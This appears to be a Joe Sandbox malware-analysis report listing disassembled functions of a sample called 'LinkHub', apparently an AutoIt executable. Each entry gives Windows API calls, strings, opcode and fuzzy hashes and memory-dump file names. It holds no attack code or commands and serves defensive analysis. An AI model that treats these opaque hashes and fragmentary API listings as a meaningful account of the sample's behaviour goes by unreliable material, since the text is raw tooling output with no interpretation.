Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 18611b6ee85a92ce748cb95f2ce77a5a78a908c1060e481c4af22ddcea8f0c54
Instruction ID: 361aa067e2b87fa36f9b5fe3809acede4b4d072af9ba4d7672d360c584261caf
Opcode Fuzzy Hash: 18611b6ee85a92ce748cb95f2ce77a5a78a908c1060e481c4af22ddcea8f0c54
Instruction Fuzzy Hash: A651FE315062469BDB25DF28C481BFA7BE4EF15310FA440D9EC91AB3D0DB34AD86CBA1

Function 00B1F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00B1F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00B1F6F4

Strings

@, xrefs: 00B1F6E8

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cf4fb30aef8dfe38f1f05ed95ed7da5b70a688d4670e7e39fd2b5fdac84b305d
Instruction ID: 97cb6b482510664a2993e2db3655989b379789d75cb88e2affb1a19898cb55d7
Opcode Fuzzy Hash: cf4fb30aef8dfe38f1f05ed95ed7da5b70a688d4670e7e39fd2b5fdac84b305d
Instruction Fuzzy Hash: 785138715087489FD320AF10DC86BAFBBE8FB94304F81889EF1D9521A1DF719529CB66

Function 00B861A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00B8623D
_wcslen.LIBCMT ref: 00B86249

Strings

CALLARGARRAY, xrefs: 00B86243, 00B86248

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 92e8e7350cdb2e4da371e1e31f8f6b72c5ceeb8b3c61935f95dc27eb857e6dbf
Instruction ID: f69fce9eb33920fd2524d06240fd1ef21f12901f025a0d9bd5a00dd853a164b3
Opcode Fuzzy Hash: 92e8e7350cdb2e4da371e1e31f8f6b72c5ceeb8b3c61935f95dc27eb857e6dbf
Instruction Fuzzy Hash: CB41AE71A00219DFCB04EFA9C8859EEBBF5FF58364F1041E9E405A72A1EB719D81CB90

Function 00B7DB39 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B7DB75
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00B7DB7F

Strings

|, xrefs: 00B7DB50

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: d9908cbeeb1987b3e2800384801e216bc9e7b96bd1131a89433f5010b0e8c0bd
Instruction ID: fd841d437b4aa5f6f828a45a876b7995fe0cb08272188661d670897bc64f2f8a
Opcode Fuzzy Hash: d9908cbeeb1987b3e2800384801e216bc9e7b96bd1131a89433f5010b0e8c0bd
Instruction Fuzzy Hash: 6A314F71801219ABCF15DFA4CC85EEEBFF9FF04344F1040A5F819A6266EB719A16DB50

Function 00B94008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00B940BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00B940F8

Strings

static, xrefs: 00B94058

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 8211162e8c283ae55816a73ef79663a1c66a53063e4f6e2fa3dfab1aaa7950f2
Instruction ID: 2a4242755d720468e235f9a1fc074f4072423ef46bfa59df4e99dde578c89922
Opcode Fuzzy Hash: 8211162e8c283ae55816a73ef79663a1c66a53063e4f6e2fa3dfab1aaa7950f2
Instruction Fuzzy Hash: 3B316F71510604AADB149F68CC80EFB77E9FF48724F108A69F9A587190DB75AC82DB60

Function 00B94FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00B950BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B950D2

Strings

', xrefs: 00B9502C

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 4c7a7db7222d2375bbef1d0fdb675c5c46c6828e8b73805f7deb1abcb78fb685
Instruction ID: 18e4adef0b4a34c070b6ccf76166ffc531657be77f233cc3dcc51e57ac618017
Opcode Fuzzy Hash: 4c7a7db7222d2375bbef1d0fdb675c5c46c6828e8b73805f7deb1abcb78fb685
Instruction Fuzzy Hash: 54312774A0160A9FDF25CFA9C991BDABBF5FF49300F1040AAE904AB391D771A945CF90

Function 00B93C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B93D18
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B93D23

Strings

Combobox, xrefs: 00B93CE5

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 281e458505caf24f8b47025e2e33ab35026760a8e4abf5599e3841a40ab47662
Instruction ID: 476dc7c1851813aa2e53f3bc57e785b7e7b4f46bd077e5ec4d12fc0d0587acc7
Opcode Fuzzy Hash: 281e458505caf24f8b47025e2e33ab35026760a8e4abf5599e3841a40ab47662
Instruction Fuzzy Hash: 3A11BF71700608AFEF118F64DC90FAB3BEAEF887A4F104175F919A7290DA71DD5197A0

Function 00B941AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00B07873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00B078B1
Part of subcall function 00B07873: GetStockObject.GDI32(00000011), ref: 00B078C5
Part of subcall function 00B07873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B078CF

GetWindowRect.USER32(00000000,?), ref: 00B94216
GetSysColor.USER32(00000012), ref: 00B94230

Strings

static, xrefs: 00B941F3

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 73b7ff09225e6bcf93cc837b96c858477bb496dd0e53e401faf3646329aa39b7
Instruction ID: af8669b8e43b304e7bfc7563d2cf65a202387c8d66f08bfe8afa300a5b84d3f7
Opcode Fuzzy Hash: 73b7ff09225e6bcf93cc837b96c858477bb496dd0e53e401faf3646329aa39b7
Instruction Fuzzy Hash: 7C111472620209AFDF00DFA9CC45EEA7BE8FB08314F014965F955E3250EB35E8519B60

Function 00B7D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B7D7C2
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B7D7EB

Strings

<local>, xrefs: 00B7D7AB

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 76d371a5424d40e576cba207992a1b54e4cb49a6054033864314efe25f70897b
Instruction ID: fe26d0252094ce57bc370ef0784cae76c9d2f92dff27a6d9bf697acbfd17dba1
Opcode Fuzzy Hash: 76d371a5424d40e576cba207992a1b54e4cb49a6054033864314efe25f70897b
Instruction Fuzzy Hash: BF11C67124523279D7384B668C85FE7BEEDEF127E4F10825AB52D93180D6649C40D6F0

Function 00B675ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

CharUpperBuffW.USER32(?,?,?), ref: 00B6761D
_wcslen.LIBCMT ref: 00B67629

Strings

STOP, xrefs: 00B67623, 00B67628

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: e09652e0d3fd0077e4af186df91b57594bf358f7b6af88fc7d4395d53637950e
Instruction ID: 37521533365e57e613f4a19a0dd3b0947565c2219d73a7a6e43cb6220297cf57
Opcode Fuzzy Hash: e09652e0d3fd0077e4af186df91b57594bf358f7b6af88fc7d4395d53637950e
Instruction Fuzzy Hash: 210104326449268BCB109FBDCC809BF77F5EB6035870006A8E42193195EF38D800C240

Function 00B6262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B64620

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B62699

Strings

ListBox, xrefs: 00B62663
ComboBox, xrefs: 00B62638

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 8fec1e69d1e6b1caa1982ed32b1ae3bdcdd5fbcc02c9c52e482121bab6342aba
Instruction ID: d30e6927708015737c62518831c673b83edc4665724a84dbce1259f8ae537a0a
Opcode Fuzzy Hash: 8fec1e69d1e6b1caa1982ed32b1ae3bdcdd5fbcc02c9c52e482121bab6342aba
Instruction Fuzzy Hash: 5C01D475A00214ABDB04EBA4CC51DFE77E8EF56350B1006AAB832972D1DF395808C760

Function 00B62525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B64620

SendMessageW.USER32(?,00000180,00000000,?), ref: 00B62593

Strings

ListBox, xrefs: 00B6255D
ComboBox, xrefs: 00B62532

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 4f41e872355edb360a76e127f37ddd8b8903385cb5b0af543f191b5c454db513
Instruction ID: a41bd44926062e963c2b663f0e5f1997976205c536df068c4713c05585018e4d
Opcode Fuzzy Hash: 4f41e872355edb360a76e127f37ddd8b8903385cb5b0af543f191b5c454db513
Instruction Fuzzy Hash: BF01DB75A401046BDB14EB90C962EFF77E8DF65340F5001AA7803A32C1DF189E08D6B1

Function 00B625A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B64620

SendMessageW.USER32(?,00000182,?,00000000), ref: 00B62615

Strings

ListBox, xrefs: 00B625E1
ComboBox, xrefs: 00B625B6

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 0377482e5dcaafd46db58c5fba09899ab406e87c9c3a6c0a8310c6f91073a5c7
Instruction ID: d42e42596d88ac204f0562b854f9371f4bbea4c72a546207c254c72965dd55f9
Opcode Fuzzy Hash: 0377482e5dcaafd46db58c5fba09899ab406e87c9c3a6c0a8310c6f91073a5c7
Instruction Fuzzy Hash: DD01D175A411046BDB15EBA0C942FFF7BE8EF15340F5001AAB803A32C1DB698E08D7B1

Function 00B626B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B329: _wcslen.LIBCMT ref: 00B0B333

Part of subcall function 00B645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B64620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00B62720

Strings

ListBox, xrefs: 00B626ED
ComboBox, xrefs: 00B626C2

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: f3928c55da03fca19ae3091dd6bf5ee34e525f92848cd07ba12e10f16816b091
Instruction ID: bf85f79480e69177068132d4a03c67cde2f793992de07e8c2578f2f17bb06564
Opcode Fuzzy Hash: f3928c55da03fca19ae3091dd6bf5ee34e525f92848cd07ba12e10f16816b091
Instruction Fuzzy Hash: ECF0A475A4121466DB04A7A48C92FFE77E8EF15790F540AA9B862A32C1DF655C088660

Function 00B61461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B6146F

Strings

Error allocating memory., xrefs: 00B61468
AutoIt, xrefs: 00B61463

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 4ee1246647c34d259f9c1981bffa47d08b6f010c2ce2d6fd9d370b559d79223b
Instruction ID: bb64c4e7a0166eff211acd00ddbd54335625b8fa15e28f0d9f8be7676d32cecf
Opcode Fuzzy Hash: 4ee1246647c34d259f9c1981bffa47d08b6f010c2ce2d6fd9d370b559d79223b
Instruction Fuzzy Hash: 24E0D83224872437D6243799BC03F8476C48F04B52F1148AAF78C654D38EF224A04399

Function 00B5E778 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(5600BC86,?), ref: 00B5E797
FreeLibrary.KERNEL32 ref: 00B5E7BD

Strings

X64, xrefs: 00B5E680

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: X64
API String ID: 3013587201-893830106
Opcode ID: bfca844606f42b6f4b03aca17f3f11c5c3a7a590284aa2d32aba881738d8a20a
Instruction ID: 6807a349d1255cb84884fabb6fa1731fc35635c0279f263aa62876dbafe98b71
Opcode Fuzzy Hash: bfca844606f42b6f4b03aca17f3f11c5c3a7a590284aa2d32aba881738d8a20a
Instruction Fuzzy Hash: C0E02B728045518BE3795B104D88FA836A4BF31742F6105DDEC16E7061EF21C988CB44

Function 00B210B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00B1FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B210E2,?,?,?,00B0100A), ref: 00B1FAD9

IsDebuggerPresent.KERNEL32(?,?,?,00B0100A), ref: 00B210E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00B0100A), ref: 00B210F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B210F0

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 5e81520e641a96631c223cf15dfbc9182828c29e7114fdae89b439202f4ab522
Instruction ID: 8a77e5bfbb0648e3502ebc9164811287cda054430ffbb86eea86ee8e8af05119
Opcode Fuzzy Hash: 5e81520e641a96631c223cf15dfbc9182828c29e7114fdae89b439202f4ab522
Instruction Fuzzy Hash: 75E06D706003618BD730AF29E905752BBE4EF14301F008D9DE889C3251EFB4D484CB91

Function 00B739D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B739F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B73A05

Strings

aut, xrefs: 00B739F9

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927300652.0000000000BCD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927323854.0000000000BD5000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_b00000_LinkHub.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: d191e0bef036c1de97da8d0278630020d601e1778c3f34f381ad5ddb2e0b59bb
Instruction ID: c896f7af7da4a31c0b6f7758971ab75b4e5a25c06fb69f2f0388bd5b0ea0af37
Opcode Fuzzy Hash: d191e0bef036c1de97da8d0278630020d601e1778c3f34f381ad5ddb2e0b59bb
Instruction Fuzzy Hash: EAD05E725403286BDB20A765DD0EFCB7A6CDB44760F0002A2BA65930A1DEB0DA85CB90

Function 00B92DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B92DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B92DDB

Part of subcall function 00B6F292: Sleep.KERNEL32 ref: 00B6F30A

Strings

Shell_TrayWnd, xrefs: 00B92DC1

Memory Dump Source

Source File: 00000026.00000002.1927179418.0000000000B01000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000026.00000002.1927153903.0000000000B00000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000B9D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.1927242555.0000000000BC3000.00000002.00000001.01000000.00000011.sdmpDownload File
